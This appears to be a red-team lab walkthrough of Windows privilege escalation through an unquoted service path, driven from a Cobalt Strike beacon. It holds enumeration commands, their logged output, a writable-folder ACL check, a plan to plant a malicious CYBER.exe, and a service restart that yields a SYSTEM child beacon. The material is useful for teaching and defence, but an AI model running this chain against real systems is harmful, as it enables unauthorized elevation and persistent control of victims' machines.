We are looking for service that we have permissions to but we was configured correctly, and we can change the path for this service. We are looking for services without quotes and that they have spaces in them.
First we will use wmic to pull all services and their paths
wmic service get name, pathname
AJRouter C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted
ALG C:\\Windows\\System32\\alg.exe
AppIDSvc C:\\Windows\\system32\\svchost.exe -k LocalServiceNetworkRestricted
ose "c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Source Engine\\OSE.EXE"
Sense "C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe"
VGAuthService "C:\\Program Files\\VMware\\VMware Tools\\VMware VGAuth\\VGAuthService.exe"
CYBERFwSvc C:\\Program Files\\CYBER\\CYBER FW\\FwSvc.exe
Manual check
Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Or we can use the following powershell link to find services without quotes:
beacon> powerpick gwmi win32_service | ?{$_} | where {($_.pathname -ne $null) -and ($_.pathname.trim() -ne "")} | where {-not $_.pathname.StartsWith("`"")} | where {($_.pathname.Substring(0, $_.pathname.IndexOf(".exe") + 4)) -match ". ."}
[*] Tasked beacon to run: gwmi win32_service | ?{$_} | where {($_.pathname -ne $null) -and ($_.pathname.trim() -ne "")} | where {-not $_.pathname.StartsWith("`"")} | where {($_.pathname.Substring(0, $_.pathname.IndexOf(".exe") + 4)) -match ". ."} (unmanaged)
[+] host called home, sent: 134767 bytes
[+] received output:
ExitCode : 1067
Name : CYBERFwSvc
ProcessId : 0
StartMode : Auto
State : Stopped
Status : OK
From the location C:\\Program Files\\CYBER\\CYBER FW\\FwSvc.exe
We can see that there is no quotes and we have spaces in the name.
Windows will attempts to read the path to this executable, it interprets the space as a kind of terminator. So it will attempt to execute the following (in order):
C:\\Program.exe
C:\\Program Files\\CYBER\\CYBER.exe
C:\\Program Files\\CYBER\\CYBER FW\\FwSvc.ex
Once we identified a service we can check the permissions of the service using the Get-Acl cmdlet
beacon> powerpick Get-Acl -Path "C:\\Program Files\\CYBER\\" | Format-List
[*] Tasked beacon to run: Get-Acl -Path "C:\\Program Files\\CYBER\\" | Format-List (unmanaged)
[+] host called home, sent: 134767 bytes
[+] received output:
Path : Microsoft.PowerShell.Core\\FileSystem::C:\\Program Files\\CYBER\\
Owner : BUILTIN\\Administrators
Group : WKSTN-3721\\None
Access : CREATOR OWNER Allow FullControl
NT AUTHORITY\\SYSTEM Allow FullControl
BUILTIN\\Administrators Allow FullControl
BUILTIN\\Users Allow ReadAndExecute, Synchronize
BUILTIN\\Users Allow Write, Synchronize
NT SERVICE\\TrustedInstaller Allow FullControl
APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES Allow ReadAndExecute, Synchronize
APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APP PACKAGES Allow ReadAndExecute,
Synchronize
Audit :
Sddl : O:BAG:S-1-5-21-3044885426-1600074939-3914761197-513D:PAI(A;OICIIO;FA;;;CO)(A;OICI;FA;;;SY)
(A;OICI;FA;;;BA)(A;OICI;0x1200a9;;;BU)(A;;0x100116;;;BU)(A;CI;FA;;;S-1-5-80-956008885-3418
522649-1831038044-1853292631-2271478464)(A;OICI;0x1200a9;;;AC)(A;OICI;0x1200a9;;;S-1-15-2-
2)
We will create malicious file named CYBER.exe
and upload it to C:\\Program Files\\CYBER\\
and then restart the service
beacon> powershell stop-service CYBERFwSvc
[*] Tasked beacon to run: stop-service CYBERFwSvc
[+] host called home, sent: 127 bytes
[+] received output:
#< CLIXML
<Objs Version="1.1.0.1" xmlns="<http://schemas.microsoft.com/powershell/2004/04>"><Obj S="progress" RefId="0"><TN RefId="0"><T>System.Management.Automation.PSCustomObject</T><T>System.Object</T></TN><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Searching for available modules</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Processing</T><SR>-1</SR><SD>Searching UNC share \\\\fs-1\\home$\\r.mckenzie\\Documents\\WindowsPowerShell\\Modules.</SD></PR></MS></Obj><Obj S="progress" RefId="1"><TNRef RefId="0" /><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Searching for available modules</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD>Searching UNC share \\\\fs-1\\home$\\r.mckenzie\\Documents\\WindowsPowerShell\\Modules.</SD></PR></MS></Obj><Obj S="progress" RefId="2"><TNRef RefId="0" /><MS><I64 N="SourceId">1</I64><PR N="Record"><AV>Preparing modules for first use.</AV><AI>0</AI><Nil /><PI>-1</PI><PC>-1</PC><T>Completed</T><SR>-1</SR><SD> </SD></PR></MS></Obj></Objs>
beacon> powershell start-service CYBERFwSvc
[*] Tasked beacon to run: start-service CYBERFwSvc
[+] host called home, sent: 127 bytes
[+] received output:
#< CLIXML
beacon> connect 127.0.0.1 1775
[*] Tasked to connect to 127.0.0.1:1775
[+] host called home, sent: 20 bytes
[+] established link to child beacon: 10.10.121.112